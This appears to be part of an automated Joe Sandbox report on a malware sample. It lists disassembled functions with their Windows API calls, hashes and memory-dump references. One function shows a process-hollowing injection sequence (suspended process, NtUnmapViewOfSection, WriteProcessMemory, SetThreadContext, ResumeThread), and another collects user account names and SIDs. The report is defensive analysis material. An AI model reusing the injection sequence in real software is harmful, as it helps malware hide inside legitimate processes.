Opcode Fuzzy Hash: f1a4e9f0fbd95db3e3d389f5980902afa4dea1f20af59d0d58b1e5bc5fae7e7e
Instruction Fuzzy Hash: 6AF0BB312403576ADB323F6EAC00F6B7B5C9F9177DF158215FD549AAD2DB34C40581A1

Uniqueness

Uniqueness Score: -1.00%

Function 0137C25D Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 0137C2A5

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 602728e0406b4f426b94bfa6c66362c231ea77ea04411f015f2870fd83605a7d
Instruction ID: 4ce6127cceaf6516324a0665971aa5e04cec1e8ed08750a8094af0201ef74db9
Opcode Fuzzy Hash: 602728e0406b4f426b94bfa6c66362c231ea77ea04411f015f2870fd83605a7d
Instruction Fuzzy Hash: 1AE0652250555345EF367AFD6C0076927896F9173DF11532AE42CD65C0DF7844418A66

Uniqueness

Uniqueness Score: -1.00%

Function 01375E20 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 01375F53

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
Instruction ID: dab6ca06767e03fe6e2d9f3b114b9072fe5cdacd3a231128152148b309719a8c
Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
Instruction Fuzzy Hash: 39314871B002048BD73C8E7C98809AEFBE8EF54229B14877EE969C7780D7389D448792

Uniqueness

Uniqueness Score: -1.00%

Function 01377403 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0136218E

Part of subcall function 01378483: RaiseException.KERNEL32(E06D7363,00000001,00000003,0136216C,?,?,?,0136216C,?,01396D1C), ref: 013784E3

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID:
API String ID: 3109751735-0
Opcode ID: ecb855037fc80ce8b9c26a0cb71d89f708995723942670c1a52ed032688b82ed
Instruction ID: 47a316203f6506aa76ec798ce0fb42b407b7edab3222dc20a9bed2ce6c011e62
Opcode Fuzzy Hash: ecb855037fc80ce8b9c26a0cb71d89f708995723942670c1a52ed032688b82ed
Instruction Fuzzy Hash: 470196B580030EA7DB24BBEDDC0999ABBACDE1021CB508575FA14B7640FB74E954C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 0137D4B1 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 0137D4EB

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 1d21bacbc552e007d8faf7eb33d88b9e870f4373daa2eb88e1600b9551244f7d
Instruction ID: 83f9d844ad0cd6d1c4631e869102225cbfef8634c22320d2f0f41752341863a0
Opcode Fuzzy Hash: 1d21bacbc552e007d8faf7eb33d88b9e870f4373daa2eb88e1600b9551244f7d
Instruction Fuzzy Hash: 7E112A71A0420AAFCF15DF98E940A9B7BF4EF48318F054059F809EB251E770EA11CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0137ED56 Relevance: 1.6, APIs: 1, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0137F925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0137E0E6,00000001,00000364,00000006,000000FF,?,?,01378272,?), ref: 0137F966

_free.LIBCMT ref: 0137EDC5

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
Instruction ID: dea11f782821891e2715a7748db72d8803131c5699091981e660b4d132e76d98
Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
Instruction Fuzzy Hash: C1014572604356AFC3318FADD88499AFBD8EB053B4F01026AE555A76C0E774A800CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01382621 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 01382684

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
Instruction ID: e50cd3f10b69f1a95895c6b6bf25e0991aadf04cbee5113d70789fd7de25b68f
Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
Instruction Fuzzy Hash: 45014F72C0025AAFCF01AFA88C00AEF7FB5AF18228F144165ED15E2190E6718A60DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0137F925 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0137E0E6,00000001,00000364,00000006,000000FF,?,?,01378272,?), ref: 0137F966

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0e40393c96f9593b53dc8be37a1b1a8d932fea37126cec52e46927d07555d67a
Instruction ID: 39c1bf2864ba96f6dfc2a755c39e4d519af3fe0cc858c6a69b0ef074da0279c2
Opcode Fuzzy Hash: 0e40393c96f9593b53dc8be37a1b1a8d932fea37126cec52e46927d07555d67a
Instruction Fuzzy Hash: 92F0543165562AB6EB325A3A9804BAB7B5DBF537B8B048115ED34A7184CA28D80186F1

Uniqueness

Uniqueness Score: -1.00%

Function 0137DB3C Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137DB6E

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6ffcb47658f9ef776f90c00d3cab363c3cd48ac50dcb70f3dc2815b6174fb03c
Instruction ID: e868797074db7fd6626fb8a9aaf938d085ab8ee9471478632ee39a45ebce32d7
Opcode Fuzzy Hash: 6ffcb47658f9ef776f90c00d3cab363c3cd48ac50dcb70f3dc2815b6174fb03c
Instruction Fuzzy Hash: 23E09B7150425667EE3126FE9D00B7B7A5CAF513FDF050125DD15972C4CB1CC80182F5

Uniqueness

Uniqueness Score: -1.00%

Function 01382368 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,01382758,?,?,00000000,?,01382758,00000000,0000000C), ref: 01382385

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b292d1b2cd6eb3373074437a2a5667d0081640f35d0ad008021def434c5add80
Instruction ID: b2a7a5b97b6cc19fe5e0d29519ef1b7765538ccfe3240e6694af2f451c53e31c
Opcode Fuzzy Hash: b292d1b2cd6eb3373074437a2a5667d0081640f35d0ad008021def434c5add80
Instruction Fuzzy Hash: 68D06C3201020DBBDF129F84DD46EDA3FAAFB48714F014010FA1856020C732E821AB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 013638C0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 163injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013638E6
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0136394B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 01363964
GetThreadContext.KERNEL32(?,00000000), ref: 0136397F
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 013639A3
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 013639BE
GetProcAddress.KERNEL32(00000000), ref: 013639C5
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 013639ED
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 01363A0E
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 01363A5A
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 01363A96
SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 01363AB2
ResumeThread.KERNEL32(?,?,?,00000000), ref: 01363ABE
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 01363ACC
VirtualFree.KERNEL32(?,00000000,00008000), ref: 01363AED

Strings

ntdll.dll, xrefs: 013639B9
NtUnmapViewOfSection, xrefs: 013639B4
, xrefs: 01363998

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
String ID: $NtUnmapViewOfSection$ntdll.dll
API String ID: 4033543172-1522589568
Opcode ID: 944a0021c676206e28c32f83b6c1556c4de6690412f620af6c486c555a45db28
Instruction ID: ccf209973c191fd5e429b5c972f9def23d9d9b80131b5f045aafb6fcfe2f7f70
Opcode Fuzzy Hash: 944a0021c676206e28c32f83b6c1556c4de6690412f620af6c486c555a45db28
Instruction Fuzzy Hash: 30519DB1A00318AFEB219F55DC49FEEB778FF08705F1040A5F609AA280D772A994CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01367F00 Relevance: 20.1, APIs: 13, Instructions: 612synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(00000000,00000000,?,0139918C,774AE603,?,00000000,00000000), ref: 01367F61
GetLastError.KERNEL32(?,00000000,00000000), ref: 01367F67

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 785ba33d48bcf7f2e0a812e784066fe4e561a272063ec4c2e7bb1827a5f2d07b
Instruction ID: cfe46cf4273de212e5dfb3d2be432e647a19ccb469f5c31614e04935c2a34251
Opcode Fuzzy Hash: 785ba33d48bcf7f2e0a812e784066fe4e561a272063ec4c2e7bb1827a5f2d07b
Instruction Fuzzy Hash: 70224971A102089FEB28DF6CCC88B9DBB79EF5931CF64856CE505A72D8D7349A80CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01383C76 Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01383CF8
_free.LIBCMT ref: 01383D1C
_free.LIBCMT ref: 01383EA9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01392620), ref: 01383EBB
_free.LIBCMT ref: 01384075

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: d0d774bafd1de6501b2725087d5ef1a0c0d0d809453d5428798228f474a2cfcc
Instruction ID: a32f40c147e46d4eeb38a14f161e9f2b1e042f6bc5d2bac7540cc2cd2d9d8a51
Opcode Fuzzy Hash: d0d774bafd1de6501b2725087d5ef1a0c0d0d809453d5428798228f474a2cfcc
Instruction Fuzzy Hash: A8C13872A00306AFDB21BF6DC850AAABFBDFF55B58F1401A9D58497381E735CA05C790

Uniqueness

Uniqueness Score: -1.00%

Function 01377AFC Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 01377B12

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 0bd741083a7d6d03cb9c95a32bab43cf232f601d38902137a22c2d2baa0b3586
Instruction ID: 4447b265ec9110b1611a3a65028d0db184db94c107cb53f1e96c3713f33777ec
Opcode Fuzzy Hash: 0bd741083a7d6d03cb9c95a32bab43cf232f601d38902137a22c2d2baa0b3586
Instruction Fuzzy Hash: BA515171E0021A8BEF35CF69D8897AABBF5FB48318F14896AD506E7344D3799900CF50

Uniqueness

Uniqueness Score: -1.00%

Function 013630E0 Relevance: 27.2, APIs: 18, Instructions: 210memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 01363132
GetProcessHeap.KERNEL32(00000008,?), ref: 01363147
HeapAlloc.KERNEL32(00000000), ref: 0136314A
GetUserNameW.ADVAPI32(00000000,?), ref: 01363158
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0136317B
GetProcessHeap.KERNEL32(00000008,?), ref: 01363186
HeapAlloc.KERNEL32(00000000), ref: 01363189
GetProcessHeap.KERNEL32(00000008,?), ref: 01363199
HeapAlloc.KERNEL32(00000000), ref: 0136319C
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 013631C6
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 013631D9
GetProcessHeap.KERNEL32(00000000,?), ref: 013632D5
HeapFree.KERNEL32(00000000), ref: 013632DE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 013632E3
HeapFree.KERNEL32(00000000), ref: 013632E6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 013632ED
HeapFree.KERNEL32(00000000), ref: 013632F0
LocalFree.KERNEL32(00000000), ref: 013632F5

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
String ID:
API String ID: 3326663573-0
Opcode ID: 1d86bb016c49999ba1de55d34d85405e2409e38f7e3700aea37e231b67b488f3
Instruction ID: 16bd8ec9a6dc9e6d8bd551713a3aa2024982ce4b9e6502b90b61f4f6a92fe6fa
Opcode Fuzzy Hash: 1d86bb016c49999ba1de55d34d85405e2409e38f7e3700aea37e231b67b488f3
Instruction Fuzzy Hash: D57152B1D00209AFEB25DFA9DC84BAFBBBCFF48314F108529E915A7244DB349905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013816C1 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 01381705

Part of subcall function 0138129E: _free.LIBCMT ref: 013812BB
Part of subcall function 0138129E: _free.LIBCMT ref: 013812CD
Part of subcall function 0138129E: _free.LIBCMT ref: 013812DF
Part of subcall function 0138129E: _free.LIBCMT ref: 013812F1
Part of subcall function 0138129E: _free.LIBCMT ref: 01381303
Part of subcall function 0138129E: _free.LIBCMT ref: 01381315
Part of subcall function 0138129E: _free.LIBCMT ref: 01381327
Part of subcall function 0138129E: _free.LIBCMT ref: 01381339
Part of subcall function 0138129E: _free.LIBCMT ref: 0138134B
Part of subcall function 0138129E: _free.LIBCMT ref: 0138135D
Part of subcall function 0138129E: _free.LIBCMT ref: 0138136F
Part of subcall function 0138129E: _free.LIBCMT ref: 01381381
Part of subcall function 0138129E: _free.LIBCMT ref: 01381393

_free.LIBCMT ref: 013816FA

Part of subcall function 0137D653: HeapFree.KERNEL32(00000000,00000000,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?), ref: 0137D669
Part of subcall function 0137D653: GetLastError.KERNEL32(?,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?,?), ref: 0137D67B

_free.LIBCMT ref: 0138171C
_free.LIBCMT ref: 01381731
_free.LIBCMT ref: 0138173C
_free.LIBCMT ref: 0138175E
_free.LIBCMT ref: 01381771
_free.LIBCMT ref: 0138177F
_free.LIBCMT ref: 0138178A
_free.LIBCMT ref: 013817C2
_free.LIBCMT ref: 013817C9
_free.LIBCMT ref: 013817E6
_free.LIBCMT ref: 013817FE

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 31c01f194f1a71f8dd875a73d417b3333fa24a2222e52bbe5bec00e54712dff8
Instruction ID: 97c0743541ad2167d16290f0636f0fe9de9343f35d48282a8b495b72d0f673be
Opcode Fuzzy Hash: 31c01f194f1a71f8dd875a73d417b3333fa24a2222e52bbe5bec00e54712dff8
Instruction Fuzzy Hash: 523169316003069FEB31BF7CD844B5AB7E9EF00628F10842EE15ED7190DA74EA82CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01378BC7 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 01378CC2
type_info::operator==.LIBVCRUNTIME ref: 01378CE9
___TypeMatch.LIBVCRUNTIME ref: 01378DF5
IsInExceptionSpec.LIBVCRUNTIME ref: 01378ED0
_UnwindNestedFrames.LIBCMT ref: 01378F57
CallUnexpected.LIBVCRUNTIME ref: 01378F72

Strings

csm, xrefs: 01378C02
csm, xrefs: 01378C6F
csm, xrefs: 01378D20

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: a5dc9c883309dae3b86ea6a089267b72d54e26f975ab54b726b7054751c5a669
Instruction ID: f2147ecb97474394a9e3ef72382c252102b8ac633957c5be0ad47fe97c69869b
Opcode Fuzzy Hash: a5dc9c883309dae3b86ea6a089267b72d54e26f975ab54b726b7054751c5a669
Instruction Fuzzy Hash: 83C19D71C0020AEFCF39DF98D8889AEBBB5BF14318F04459AE9156B611D339DA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0137DE2C Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0137DE42

Part of subcall function 0137D653: HeapFree.KERNEL32(00000000,00000000,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?), ref: 0137D669
Part of subcall function 0137D653: GetLastError.KERNEL32(?,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?,?), ref: 0137D67B

_free.LIBCMT ref: 0137DE4E
_free.LIBCMT ref: 0137DE59
_free.LIBCMT ref: 0137DE64
_free.LIBCMT ref: 0137DE6F
_free.LIBCMT ref: 0137DE7A
_free.LIBCMT ref: 0137DE85
_free.LIBCMT ref: 0137DE90
_free.LIBCMT ref: 0137DE9B
_free.LIBCMT ref: 0137DEA9

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4d6d89e8cba0fc63c1f948f7e1d6fe4f73fe5e8efe6f34493540b307b2acdedf
Instruction ID: 7bfcff11f7dcad3b9d11f971216d57e9119aba0fe986d7fb4e57b87d6513dcd4
Opcode Fuzzy Hash: 4d6d89e8cba0fc63c1f948f7e1d6fe4f73fe5e8efe6f34493540b307b2acdedf
Instruction Fuzzy Hash: 9A21C976904109AFCB11EFD8C880DDE7BB8BF18654F4081A6F61E9B120DB75EA84CB80

Uniqueness

Uniqueness Score: -1.00%

Function 013686E2 Relevance: 13.8, APIs: 9, Instructions: 341networkfileCOMMON

Download Yara Rule

APIs

